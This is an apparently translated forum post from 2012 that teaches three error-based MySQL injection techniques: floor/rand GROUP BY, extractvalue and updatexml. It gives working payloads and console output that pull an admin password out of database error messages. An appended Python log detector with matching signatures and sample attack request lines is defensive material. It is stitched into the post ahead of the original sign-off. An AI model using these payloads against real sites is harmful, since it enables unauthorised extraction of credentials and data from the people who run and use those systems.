Title: Three error-based techniques in MySQL injection
Author: admin   Time: 2012-12-10 10:28

Posting some of my old notes. MySQL throws an exception message when a statement fails, and sites built on php+mysql often render that error output on the page, so the following three constructions can be used to retrieve specific data from the error text.

Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+

1. Error via floor()

The following payloads can be used (the duplicate-key error comes from GROUP BY on a key that contains floor(rand(0)*2)):

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:

First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id input is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version is leaked in the error message. To retrieve other data, replace the version() subexpression with the query you want.

For example, to query the admin username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c, (select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
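As an added example from the monitoring side (not part of the original post), the following Python detector flags the three techniques above in two places: the injected fragment in web-access log lines, and the leaking MySQL error text in application error logs or response bodies. The log lines, the `app-error:` prefix and the signature names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures for the three techniques described in the post.
# The floor() technique needs both floor(rand(N)*2) and a GROUP BY in one query,
# so both are required (as lookaheads) before a line is flagged.
REQUEST_SIGNATURES = {
    "floor-rand-groupby": re.compile(
        r"(?=.*\bfloor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\))(?=.*\bgroup\s+by\b)",
        re.I | re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
}

# Error-side signatures: the messages the post shows MySQL emitting. The captured
# value is what leaked (for the floor technique the trailing 0/1 is the floor() digit).
ERROR_SIGNATURES = {
    "dup-group-key": re.compile(r"Duplicate entry '(?P<leak>[^']*)' for key 'group_key'"),
    "xpath-error": re.compile(r"XPATH syntax error: '(?P<leak>[^']*)'"),
}

def normalize(line: str) -> str:
    """URL-decode twice (catches double encoding), drop /* */ comments, collapse whitespace."""
    s = unquote_plus(unquote_plus(line))
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    return re.sub(r"\s+", " ", s)

def classify(line: str) -> dict:
    """Return {signature_name: leaked_value_or_None} for every signature found on the line."""
    hits = {}
    normalized = normalize(line)
    for name, rx in REQUEST_SIGNATURES.items():
        if rx.search(normalized):
            hits[name] = None
    for name, rx in ERROR_SIGNATURES.items():
        m = rx.search(line)  # error text is matched raw, it is not URL-encoded
        if m:
            hits[name] = m.group("leak")
    return hits

def scan(lines):
    """Return [(line_no, hits)] for every line that matched at least one signature."""
    return [(i, h) for i, ln in enumerate(lines, 1) if (h := classify(ln))]

SAMPLE_LOG = [  # constructed sample lines, not taken from any real system
    "GET /article.php?id=1 HTTP/1.1",
    "GET /article.php?id=1+and+(select+1+from+(select+count(*),concat(version(),"
    "floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1",
    "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20pass%20from%20admin%20limit%201)))-- HTTP/1.1",
    "GET /article.php?id=1 and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1)) HTTP/1.1",
    "app-error: ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "app-error: ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'",
]
```

The error-side matches are the higher-confidence signal: they only fire once the database has actually evaluated an injected expression, which is also the point where turning off error display on the PHP side and using parameterized queries removes the channel the post relies on.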
All, thanks foreign guys.